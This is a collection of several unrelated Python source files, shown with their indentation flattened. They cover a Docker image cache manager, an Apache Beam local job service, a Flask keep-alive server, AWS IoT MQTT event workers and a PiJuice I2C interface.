rd = dateutil.relativedelta.relativedelta(microseconds=elapsed*1000000)
# Based on http://stackoverflow.com/questions/6574329/
attrs = ['years', 'months', 'days', 'hours', 'minutes', 'seconds']
def human_readable(delta):
return ['%d %s' % (getattr(delta, attr),
getattr(delta, attr) > 1
and attr or attr[:-1])
for attr in attrs if getattr(delta, attr)]
return ' '.join(human_readable(rd))
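# Illustrative example (not original code): an elapsed time of 3725 seconds becomes
# hours=1, minutes=2, seconds=5 in the relativedelta, so the function should return
# '1 hour 2 minutes 5 seconds' (the trailing 's' is stripped only when a value is
# exactly 1).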
def main():
args = _parse_args()
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(args.log)
logger.addHandler(handler)
if args.debug:
logger.setLevel(DEBUG)
handler.setLevel(DEBUG)
elif args.warn:
logger.setLevel(WARN)
handler.setLevel(WARN)
else:
logger.setLevel(args.log)
handler.setLevel(args.log)
if args.verbose_log_file:
log_file = args.verbose_log_file
log_dir = os.path.dirname(log_file)
if os.path.isdir(log_file):
logger.error('{} is a directory'.format(log_file))
return
# If the user has no appropriate permission, exit.
if not (os.path.exists(log_dir)
and os.path.isdir(log_dir)
and os.access(log_dir, os.W_OK)
and (not os.path.exists(log_file)
or os.access(log_file, os.W_OK))):
logger.error('No permission to write to {}'
.format(log_file))
return
file_handler = RotatingFileHandler(log_file,
encoding='utf-8',
maxBytes=30*1024*1024,
backupCount=5)
formatter = Formatter('%(asctime)s - %(levelname)s - %(message)s')
file_handler.setFormatter(formatter)
logger.setLevel(DEBUG)
file_handler.setLevel(DEBUG)
logger.addHandler(file_handler)
start_time = time.time()
successful = False
logger.info("Start running at {} ({} with Python {})"
.format(datetime.fromtimestamp(start_time).isoformat(),
Version, platform.python_version()))
logger.debug("Detailed Python version: {}"
.format(sys.version.replace('\n', ' ')))
logger.debug("src-type: {}".format(args.src_type))
try:
successful = _main_inter(args, logger)
except KeyboardInterrupt:
logger.error('Keyboard-interrupted. Exiting.')
return
except Exception:
logger.error(traceback.format_exc())
raise
end_time = time.time()
if successful:
logger.info('Finished running successfully at {}'
.format(datetime.fromtimestamp(end_time).isoformat()))
else:
logger.error('Failed running (ended at {})'
.format(datetime.fromtimestamp(end_time).isoformat()))
elapsed = end_time - start_time
human_readable = _get_human_readable_time(elapsed)
if human_readable:
logger.info('Elapsed: {:.3f} sec ({})'.format(elapsed, human_readable))
else:
logger.info('Elapsed: {:.3f} sec'.format(elapsed))
if __name__ == '__main__':
main()
|
docker_image_manager.py
|
from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
from codalabworker.fsm import DependencyStage
from codalabworker.state_committer import JsonStateCommitter
from codalabworker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image (also includes the digest being pulled, digest string, DependencyStage and relevant status message from the download)
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant to caching of Docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
def __init__(self, commit_file, max_image_cache_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env() # type: DockerClient
self._image_cache = {} # type: Dict[str, ImageCacheEntry]
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._lock = threading.RLock()
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
self._load_state()
def _save_state(self):
with self._lock:
self._state_committer.commit(self._image_cache)
def _load_state(self):
with self._lock:
self._image_cache = self._state_committer.load()
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
self._save_state()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about
2. We use the sum of VirtualSize's, which is an upper bound on the disk use of our images:
if no images share any intermediate layers, this is the real disk use; however, if
images share layers, the virtual size counts that layer's size once for each image
that uses it, even though it is stored only once on disk. The 'Size' field accounts
for the marginal size each image adds on top of the shared layers, but summing those
is not accurate either, since the shared base layers need to be counted once to get
the total size (i.e. summing marginal sizes would give us a lower bound on the total
disk use of images). Calling df gives us an accurate disk use of ALL the images on
the machine, but because of (1) we don't want to use that.
"""
while not self._stop:
deletable_entries = set(self._image_cache.values())
disk_use = sum(cache_entry.virtual_size for cache_entry in deletable_entries)
while disk_use > self._max_image_cache_size:
entry_to_remove = min(deletable_entries, key=lambda entry: entry.last_used)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
disk_use,
self._max_image_cache_size,
entry_to_remove.digest,
)
try:
image_to_delete = self._docker.images.get(entry_to_remove.id)
tags_to_delete = image_to_delete.tags
for tag in tags_to_delete:
self._docker.images.remove(tag)
# if we successfully removed the image also remove its cache entry
del self._image_cache[entry_to_remove.digest]
except docker.errors.NotFound:
# image doesn't exist anymore for some reason, stop tracking it
del self._image_cache[entry_to_remove.digest]
except docker.errors.APIError as err:
# Maybe we can't delete this image because its container is still running
# (think a run that takes 4 days so this is the oldest image but still in use)
# In that case we just continue with our lives, hoping it will get deleted once
# it's no longer in use and the cache becomes full again
logger.error(
"Cannot remove image %s from cache: %s", entry_to_remove.digest, err
)
deletable_entries.remove(entry_to_remove)
disk_use = sum(entry.virtual_size for entry in deletable_entries)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
Request the Docker image identified by image_spec.
:param image_spec: Repo image_spec of the Docker image being requested
:returns: An ImageAvailabilityState object with the state of the Docker image
"""
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
# Hence, if no tag is specified, we append the ':latest' tag to the image spec right here at the very beginning.
image_spec += ':latest'
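# e.g. (illustrative): 'codalab/default-cpu' becomes 'codalab/default-cpu:latest',
# while specs that already carry a tag or digest ('ubuntu:18.04',
# 'ubuntu@sha256:...') are left untouched by this branch.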
try:
image = self._docker.images.get(image_spec)
digests = image.attrs.get('RepoDigests', [image_spec])
if len(digests) == 0:
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.FAILED,
message='No digest available for {}, probably because it was built locally; delete the Docker image on the worker and try again'.format(
image_spec
),
)
digest = digests[0]
with self._lock:
self._image_cache[digest] = ImageCacheEntry(
id=image.id,
digest=digest,
last_used=time.time(),
virtual_size=image.attrs['VirtualSize'],
marginal_size=image.attrs['Size'],
)
# We can remove the download thread if it still exists
if image_spec in self._downloading:
self._downloading.remove(image_spec)
return ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message='Image ready'
)
except docker.errors.ImageNotFound:
return self._pull_or_report(image_spec) # type: ImageAvailabilityState
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
def _pull_or_report(self, image_spec):
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
digest = self._docker.images.get(image_spec).attrs.get(
'RepoDigests', [image_spec]
)[0]
status = ImageAvailabilityState(
digest=digest,
stage=DependencyStage.READY,
message=self._downloading[image_spec]['message'],
)
else:
status = ImageAvailabilityState(
digest=None,
stage=DependencyStage.FAILED,
message=self._downloading[image_spec]['message'],
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
self._downloading[image_spec]['message'] = "Can't download image: {}".format(ex)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
from typing import TYPE_CHECKING
from typing import List
from typing import Optional
import grpc
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner import fn_runner
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.portability.api import beam_runner_api_pb2
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
This JobService uses a basic local implementation of runner to run the job.
This JobService is not capable of managing jobs on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._artifact_service = artifact_service.BeamFilesystemArtifactService(
self._staging_dir)
self._artifact_staging_endpoint = None # type: Optional[endpoints_pb2.ApiServiceDescriptor]
def create_beam_job(self,
preparation_id, # type: str
job_name, # type: str
pipeline, # type: beam_runner_api_pb2.Pipeline
options # type: struct_pb2.Struct
):
# type: (...) -> BeamJob
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
provision_info = fn_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
pipeline_options=options,
retrieval_token=self._artifact_service.retrieval_token(
preparation_id)),
self._staging_dir,
job_name=job_name)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint)
def get_bind_address(self):
"""Return the address used to open the port on the gRPC server.
This is often, but not always, the same as the service address. For
example, to make the service accessible to external machines, override this
to return '[::]' and override `get_service_address()` to return a publicly
accessible host name.
"""
return self.get_service_address()
def get_service_address(self):
"""Return the host name at which this server will be accessible.
In particular, this is provided to the client upon connection as the
artifact staging endpoint.
"""
return 'localhost'
def start_grpc_server(self, port=0):
self._server = grpc.server(UnboundedThreadPoolExecutor())
port = self._server.add_insecure_port(
'%s:%d' % (self.get_bind_address(), port))
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
hostname = self.get_service_address()
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='%s:%d' % (hostname, port))
self._server.start()
_LOGGER.info('Grpc server started at %s on port %d' % (hostname, port))
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos._is_user_monitoring_info(x) or
monitoring_infos._is_user_distribution_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(
self,
worker_command_line, # type: bytes
control_address,
worker_id=None):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(UnboundedThreadPoolExecutor())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with fn_runner.SUBPROCESS_LOCK:
p = subprocess.Popen(self._worker_command_line, shell=True, env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id, # type: str
pipeline,
options,
provision_info, # type: fn_runner.ExtendedProvisionInfo
artifact_staging_endpoint # type: Optional[endpoints_pb2.ApiServiceDescriptor]
):
super(BeamJob,
self).__init__(job_id, provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._state_queues = [] # type: List[queue.Queue]
self._log_queues = [] # type: List[queue.Queue]
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
try:
result = fn_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
_LOGGER.exception('Error running pipeline.')
_LOGGER.error(traceback.format_exc())
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime(
'%Y-%m-%d %H:%M:%S.', time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "papicito is sexy"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
workers.py
|
# /*
# * Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# *
# * Licensed under the Apache License, Version 2.0 (the "License").
# * You may not use this file except in compliance with the License.
# * A copy of the License is located at
# *
# * http://aws.amazon.com/apache2.0
# *
# * or in the "license" file accompanying this file. This file is distributed
# * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# * express or implied. See the License for the specific language governing
# * permissions and limitations under the License.
# */
import time
import logging
from threading import Thread
from threading import Event
from AWSIoTPythonSDK.core.protocol.internal.events import EventTypes
from AWSIoTPythonSDK.core.protocol.internal.events import FixedEventMids
from AWSIoTPythonSDK.core.protocol.internal.clients import ClientStatus
from AWSIoTPythonSDK.core.protocol.internal.queues import OfflineRequestQueue
from AWSIoTPythonSDK.core.protocol.internal.requests import RequestTypes
from AWSIoTPythonSDK.core.protocol.paho.client import topic_matches_sub
from AWSIoTPythonSDK.core.protocol.internal.defaults import DEFAULT_DRAINING_INTERNAL_SEC
class EventProducer(object):
_logger = logging.getLogger(__name__)
def __init__(self, cv, event_queue):
self._cv = cv
self._event_queue = event_queue
def on_connect(self, client, user_data, flags, rc):
self._add_to_queue(FixedEventMids.CONNACK_MID, EventTypes.CONNACK, rc)
self._logger.debug("Produced [connack] event")
def on_disconnect(self, client, user_data, rc):
self._add_to_queue(FixedEventMids.DISCONNECT_MID, EventTypes.DISCONNECT, rc)
self._logger.debug("Produced [disconnect] event")
def on_publish(self, client, user_data, mid):
self._add_to_queue(mid, EventTypes.PUBACK, None)
self._logger.debug("Produced [puback] event")
def on_subscribe(self, client, user_data, mid, granted_qos):
self._add_to_queue(mid, EventTypes.SUBACK, granted_qos)
self._logger.debug("Produced [suback] event")
def on_unsubscribe(self, client, user_data, mid):
self._add_to_queue(mid, EventTypes.UNSUBACK, None)
self._logger.debug("Produced [unsuback] event")
def on_message(self, client, user_data, message):
self._add_to_queue(FixedEventMids.MESSAGE_MID, EventTypes.MESSAGE, message)
self._logger.debug("Produced [message] event")
def _add_to_queue(self, mid, event_type, data):
with self._cv:
self._event_queue.put((mid, event_type, data))
self._cv.notify()
class EventConsumer(object):
MAX_DISPATCH_INTERNAL_SEC = 0.3
_logger = logging.getLogger(__name__)
def __init__(self, cv, event_queue, internal_async_client,
subscription_manager, offline_requests_manager, client_status):
self._cv = cv
self._event_queue = event_queue
self._internal_async_client = internal_async_client
self._subscription_manager = subscription_manager
self._offline_requests_manager = offline_requests_manager
self._client_status = client_status
self._is_running = False
self._draining_interval_sec = DEFAULT_DRAINING_INTERNAL_SEC
self._dispatch_methods = {
EventTypes.CONNACK : self._dispatch_connack,
EventTypes.DISCONNECT : self._dispatch_disconnect,
EventTypes.PUBACK : self._dispatch_puback,
EventTypes.SUBACK : self._dispatch_suback,
EventTypes.UNSUBACK : self._dispatch_unsuback,
EventTypes.MESSAGE : self._dispatch_message
}
self._offline_request_handlers = {
RequestTypes.PUBLISH : self._handle_offline_publish,
RequestTypes.SUBSCRIBE : self._handle_offline_subscribe,
RequestTypes.UNSUBSCRIBE : self._handle_offline_unsubscribe
}
self._stopper = Event()
def update_offline_requests_manager(self, offline_requests_manager):
self._offline_requests_manager = offline_requests_manager
def update_draining_interval_sec(self, draining_interval_sec):
self._draining_interval_sec = draining_interval_sec
def get_draining_interval_sec(self):
return self._draining_interval_sec
def is_running(self):
return self._is_running
def start(self):
self._stopper.clear()
self._is_running = True
dispatch_events = Thread(target=self._dispatch)
dispatch_events.daemon = True
dispatch_events.start()
self._logger.debug("Event consuming thread started")
def stop(self):
if self._is_running:
self._is_running = False
self._clean_up()
self._logger.debug("Event consuming thread stopped")
def _clean_up(self):
self._logger.debug("Cleaning up before stopping event consuming")
with self._event_queue.mutex:
self._event_queue.queue.clear()
self._logger.debug("Event queue cleared")
self._internal_async_client.stop_background_network_io()
self._logger.debug("Network thread stopped")
self._internal_async_client.clean_up_event_callbacks()
self._logger.debug("Event callbacks cleared")
def wait_until_it_stops(self, timeout_sec):
self._logger.debug("Waiting for event consumer to completely stop")
return self._stopper.wait(timeout=timeout_sec)
def is_fully_stopped(self):
return self._stopper.is_set()
def _dispatch(self):
while self._is_running:
with self._cv:
if self._event_queue.empty():
self._cv.wait(self.MAX_DISPATCH_INTERNAL_SEC)
else:
while not self._event_queue.empty():
self._dispatch_one()
self._stopper.set()
self._logger.debug("Exiting dispatching loop...")
def _dispatch_one(self):
mid, event_type, data = self._event_queue.get()
if mid:
self._dispatch_methods[event_type](mid, data)
self._internal_async_client.invoke_event_callback(mid, data=data)
# We need to make sure disconnect event gets dispatched and then we stop the consumer
if self._need_to_stop_dispatching(mid):
self.stop()
def _need_to_stop_dispatching(self, mid):
status = self._client_status.get_status()
return (ClientStatus.USER_DISCONNECT == status or ClientStatus.CONNECT == status) \
and mid == FixedEventMids.DISCONNECT_MID
def _dispatch_connack(self, mid, rc):
status = self._client_status.get_status()
self._logger.debug("Dispatching [connack] event")
if self._need_recover():
if ClientStatus.STABLE != status: # To avoid multiple connack dispatching
self._logger.debug("Has recovery job")
clean_up_debt = Thread(target=self._clean_up_debt)
clean_up_debt.start()
else:
self._logger.debug("No need for recovery")
self._client_status.set_status(ClientStatus.STABLE)
def _need_recover(self):
return self._subscription_manager.list_records() or self._offline_requests_manager.has_more()
def _clean_up_debt(self):
self._handle_resubscribe()
self._handle_draining()
self._client_status.set_status(ClientStatus.STABLE)
def _handle_resubscribe(self):
subscriptions = self._subscription_manager.list_records()
if subscriptions and not self._has_user_disconnect_request():
self._logger.debug("Start resubscribing")
self._client_status.set_status(ClientStatus.RESUBSCRIBE)
for topic, (qos, message_callback) in subscriptions:
if self._has_user_disconnect_request():
self._logger.debug("User disconnect detected")
break
self._internal_async_client.subscribe(topic, qos)
def _handle_draining(self):
if self._offline_requests_manager.has_more() and not self._has_user_disconnect_request():
self._logger.debug("Start draining")
self._client_status.set_status(ClientStatus.DRAINING)
while self._offline_requests_manager.has_more():
if self._has_user_disconnect_request():
self._logger.debug("User disconnect detected")
break
offline_request = self._offline_requests_manager.get_next()
if offline_request:
self._offline_request_handlers[offline_request.type](offline_request)
time.sleep(self._draining_interval_sec)
def _has_user_disconnect_request(self):
return ClientStatus.USER_DISCONNECT == self._client_status.get_status()
def _dispatch_disconnect(self, mid, rc):
self._logger.debug("Dispatching [disconnect] event")
status = self._client_status.get_status()
if ClientStatus.USER_DISCONNECT == status or ClientStatus.CONNECT == status:
pass
else:
self._client_status.set_status(ClientStatus.ABNORMAL_DISCONNECT)
# For puback, suback and unsuback, ack callback invocation is handled in dispatch_one
# Do nothing in the event dispatching itself
def _dispatch_puback(self, mid, rc):
self._logger.debug("Dispatching [puback] event")
def _dispatch_suback(self, mid, rc):
self._logger.debug("Dispatching [suback] event")
def _dispatch_unsuback(self, mid, rc):
self._logger.debug("Dispatching [unsuback] event")
def _dispatch_message(self, mid, message):
self._logger.debug("Dispatching [message] event")
subscriptions = self._subscription_manager.list_records()
if subscriptions:
for topic, (qos, message_callback) in subscriptions:
if topic_matches_sub(topic, message.topic) and message_callback:
message_callback(None, None, message) # message_callback(client, userdata, message)
def _handle_offline_publish(self, request):
topic, payload, qos, retain = request.data
self._internal_async_client.publish(topic, payload, qos, retain)
self._logger.debug("Processed offline publish request")
def _handle_offline_subscribe(self, request):
topic, qos, message_callback = request.data
self._subscription_manager.add_record(topic, qos, message_callback)
self._internal_async_client.subscribe(topic, qos)
self._logger.debug("Processed offline subscribe request")
def _handle_offline_unsubscribe(self, request):
topic = request.data
self._subscription_manager.remove_record(topic)
self._internal_async_client.unsubscribe(topic)
self._logger.debug("Processed offline unsubscribe request")
class SubscriptionManager(object):
_logger = logging.getLogger(__name__)
def __init__(self):
self._subscription_map = dict()
def add_record(self, topic, qos, message_callback):
self._logger.debug("Adding a new subscription record: %s qos: %d", topic, qos)
self._subscription_map[topic] = qos, message_callback # message_callback could be None
def remove_record(self, topic):
self._logger.debug("Removing subscription record: %s", topic)
if self._subscription_map.get(topic): # Ignore topics that are never subscribed to
del self._subscription_map[topic]
else:
self._logger.warn("Removing attempt for non-exist subscription record: %s", topic)
def list_records(self):
return list(self._subscription_map.items())
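# Illustrative note (not original code): records are stored as
# {topic: (qos, message_callback)}, so list_records() yields tuples such as
# ('sensors/+/temperature', (1, on_message)) that the resubscribe and message
# dispatch loops above unpack via `for topic, (qos, message_callback) in ...`.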
class OfflineRequestsManager(object):
_logger = logging.getLogger(__name__)
def __init__(self, max_size, drop_behavior):
self._queue = OfflineRequestQueue(max_size, drop_behavior)
def has_more(self):
return len(self._queue) > 0
def add_one(self, request):
return self._queue.append(request)
def get_next(self):
if self.has_more():
return self._queue.pop(0)
else:
return None
|
pijuice.py
|
#!/usr/bin/env python3
__version__ = "1.8"
import ctypes
import sys
import threading
import time
from smbus import SMBus
pijuice_hard_functions = ['HARD_FUNC_POWER_ON', 'HARD_FUNC_POWER_OFF', 'HARD_FUNC_RESET']
pijuice_sys_functions = ['SYS_FUNC_HALT', 'SYS_FUNC_HALT_POW_OFF', 'SYS_FUNC_SYS_OFF_HALT', 'SYS_FUNC_REBOOT']
pijuice_user_functions = ['USER_EVENT'] + ['USER_FUNC' + str(i+1) for i in range(0, 15)]
class PiJuiceInterface(object):
def __init__(self, bus=1, address=0x14):
"""Create a new PiJuice instance. Bus is an optional parameter that
specifies the I2C bus number to use, for example 1 would use device
/dev/i2c-1. If bus is not specified then the open function should be
called to open the bus.
"""
self.i2cbus = SMBus(bus)
self.addr = address
self.t = None
self.comError = False
self.errTime = 0
def __del__(self):
"""Clean up any resources used by the PiJuice instance."""
self.i2cbus = None
def __enter__(self):
"""Context manager enter function."""
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Context manager exit function, ensures resources are cleaned up."""
self.i2cbus = None
return False # Don't suppress exceptions
def GetAddress(self):
return self.addr
def _GetChecksum(self, data):
fcs = 0xFF
        for x in data:
fcs = fcs ^ x
return fcs
def _Read(self):
try:
d = self.i2cbus.read_i2c_block_data(self.addr, self.cmd, self.length)
self.d = d
self.comError = False
        except Exception:  # typically IOError on I2C failure
self.comError = True
self.errTime = time.time()
self.d = None
def _Write(self):
try:
self.i2cbus.write_i2c_block_data(self.addr, self.cmd, self.d)
self.comError = False
        except Exception:  # typically IOError on I2C failure
self.comError = True
self.errTime = time.time()
def _DoTransfer(self, oper):
        if (self.t is not None and self.t.is_alive()) or (self.comError and (time.time()-self.errTime) < 4):
return False
